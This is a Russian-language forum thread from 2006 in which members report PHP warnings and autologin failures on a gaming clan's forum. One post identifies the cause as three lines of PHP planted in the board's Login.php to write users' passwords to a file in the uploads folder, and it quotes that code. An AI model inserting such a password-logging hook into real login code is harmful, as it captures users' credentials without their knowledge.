Гость Lilija Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Когда логинюсь на форум вылезает сверху. Warning: fopen() expects at least 2 parameters, 1 given in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 394 Warning: fputs(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 395 Warning: fclose(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 396 Ссылка на комментарий Поделиться на другие сайты More sharing options...
Гость bavari Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Привет, Лиль! У меня та же фигня! Ссылка на комментарий Поделиться на другие сайты More sharing options...
Baltica Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 У меня тоже Ссылка на комментарий Поделиться на другие сайты More sharing options...
Urban Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Аналогично, заходит через пень-колоду уже неделю наверное Ссылка на комментарий Поделиться на другие сайты More sharing options...
Bugel Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Это у мозилы, с оперой такой хрени нет. С уважением, bugel- ------------------------- Ссылка на комментарий Поделиться на другие сайты More sharing options...
Bizet(Би-Зет) Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 А я кукизы юзаю . Логика и тактика! (С) Би-Зет 57 Ссылка на комментарий Поделиться на другие сайты More sharing options...
DEmentED Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Автологин поможет. Подпись сюда надо новую придумать бы. --- Ссылка на комментарий Поделиться на другие сайты More sharing options...
Urban Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Ничего не понял. У меня стандартный ИЕ и автологин работать перестал. Что сделать можно, кроме как убить себя? ) Ссылка на комментарий Поделиться на другие сайты More sharing options...
El_Brujo Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Демент, автологин отвалился у нас с Тони дней пять назад, наверное. Через раз срабатывает. "Кто видел войну не из штабов, а с поля боя, кто сам был малой частью этих нацеленных стрел и стрелочек, которые так красиво вычерчивают на картах, для того война совсем другая." (с) Григорий Бакланов, "Высота духа" Ссылка на комментарий Поделиться на другие сайты More sharing options...
Гость AMAN Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Не знаю как там нашёт багов, лагов но у меня всё пашит отлично. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Urban Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 А новичкам везет Ссылка на комментарий Поделиться на другие сайты More sharing options...
pisto Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 У меня со входом на форум все ОК.И не глючило никогда.Стоит IE6.0. 123 Ссылка на комментарий Поделиться на другие сайты More sharing options...
Alex_nn Опубликовано 13 апреля, 2006 Поделиться Опубликовано 13 апреля, 2006 Аналогично, И.Е никаких проблемм. 1. "Военное дело просто и вполне доступно здравому уму человека. Но воевать сложно". Карл фон Клаузевиц 2. НЕНАВИЖУ ФОКИ!!! Ссылка на комментарий Поделиться на другие сайты More sharing options...
DEmentED Опубликовано 14 апреля, 2006 Поделиться Опубликовано 14 апреля, 2006 Зайти на форум. Залогиниться. Нажать "Удалить все куки" и попробовать заново залогиниться. Подпись сюда надо новую придумать бы. --- Ссылка на комментарий Поделиться на другие сайты More sharing options...
Baltica Опубликовано 14 апреля, 2006 Поделиться Опубликовано 14 апреля, 2006 Зайти на форум. Залогиниться. Нажать "Удалить все куки" и попробовать заново залогиниться. Не помогает. IE 6.0.2900 Кроме того, форум не запоминает, какие сообщения я уже прочитал. ПРиходится жать каждый раз "Отметить все сообщения как прочитанные" До переустановки системы все работало отлично. Привык, пААнимаешь к хорошему. Ссылка на комментарий Поделиться на другие сайты More sharing options...
operok Опубликовано 16 апреля, 2006 Поделиться Опубликовано 16 апреля, 2006 Когда логинюсь на форум вылезает сверху. Warning: fopen() expects at least 2 parameters, 1 given in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 394 Warning: fputs(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 395 Warning: fclose(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 396 Поламать нас кто-то хотел, по этим строчкам с ошибками такой код появился (в дистрибутивном файле его нету): $loggs = fopen("uploads/pwdlg.txt"); fputs($loggs,$ibforums->input['PassWord']."\n"); fclose($loggs); который должен был скидывать наши пароли в файл uploads/pwdlg.txt Но к счастью тот код для другой версии php и у нас просто не заработал [капитан 72аг] участник беллумской операции участник боев на генадиче1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
Baltica Опубликовано 17 апреля, 2006 Поделиться Опубликовано 17 апреля, 2006 Вот вдруг неожиданно сегодня произошел авто логин. Ничего не делал для этого!!!!Может и прочитанные сообщения помнить будет как раньше? Ссылка на комментарий Поделиться на другие сайты More sharing options...
внр Опубликовано 17 апреля, 2006 Поделиться Опубликовано 17 апреля, 2006 Извините,у меня всё работает просто отлично,если загружается.Стоит " Мозила"... эРэС убивает Б-17,а "месса"-разрывает на куски! Ссылка на комментарий Поделиться на другие сайты More sharing options...
Tony_8r46 Опубликовано 17 апреля, 2006 Поделиться Опубликовано 17 апреля, 2006 Дык уже поправили! %) Бей гадов! ------------- Читайте Шоу! (с)72AG_terror Ссылка на комментарий Поделиться на другие сайты More sharing options...
внр Опубликовано 17 апреля, 2006 Поделиться Опубликовано 17 апреля, 2006 Когда был общий глюкинштейн-не грузилось и у меня... эРэС убивает Б-17,а "месса"-разрывает на куски! Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти